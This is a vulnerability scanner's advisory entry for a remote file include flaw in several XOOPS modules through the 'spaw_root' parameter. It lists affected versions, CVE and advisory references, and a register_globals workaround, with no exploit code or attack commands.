| VID |
210059 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The XOOPS program is vulnerable to a remote file include vulnerability via the 'spaw_root' parameter. XOOPS is a dynamic object oriented based open source portal system written in PHP. Some copies of the SPAW PHP WYSIWYG editor control for XOOPS could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'spaw_root' parameter of the 'spaw_control.class.php' script. If the register_globals is enabled, a remote attacker could send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://www.xoops.org/modules/news/article.php?storyid=3799
http://www.frsirt.com/english/advisories/2007/2047
http://www.frsirt.com/english/advisories/2007/2204
http://www.frsirt.com/english/advisories/2007/2205
http://www.frsirt.com/english/advisories/2007/2206
http://secunia.com/advisories/25522
http://secunia.com/advisories/25652
http://secunia.com/advisories/25665
http://secunia.com/advisories/25667
http://www.milw0rm.com/exploits/4022
http://www.milw0rm.com/exploits/4063
http://www.milw0rm.com/exploits/4069
http://www.milw0rm.com/exploits/4070
http://www.milw0rm.com/exploits/4084
* Platforms Affected:
Planet XOOPS, XOOPS WIWIMOD module version 0.4
Planet XOOPS, XOOPS TinyContent module versions 1.5 and earlier
Planet XOOPS, XOOPS Cjay Content WYSIWYG IE module versions 3.0 and earlier
Planet XOOPS, XOOPS XT-Conteudo module versions 1.52 and earlier
Planet XOOPS, XOOPS icontent module version 1.0
Any operating system Any version |
| Recommendation |
No upgrade or patch available as of June 2014.
As a workaround, disable its 'register_globals' setting.
-- OR --
Upgrade to a fixed version of Xoops Module, when new fixed version becomes available from the following Web sites:
For XOOPS TinyContent module:
http://www.chapi.de/category/xoops/
For XOOPS Cjay Content WYSIWYG IE module:
http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
For XOOPS XT-Conteudo module:
http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
For XOOPS icontent module:
http://www.xoops.org/modules/news/article.php?storyid=1207 |
| Related URL |
CVE-2007-3057,CVE-2007-3220,CVE-2007-3221,CVE-2007-3237,CVE-2007-3289 (CVE) |
| Related URL |
24302,24470 (SecurityFocus) |
| Related URL |
34681,34855,34856,34839,34951 (ISS) |
|
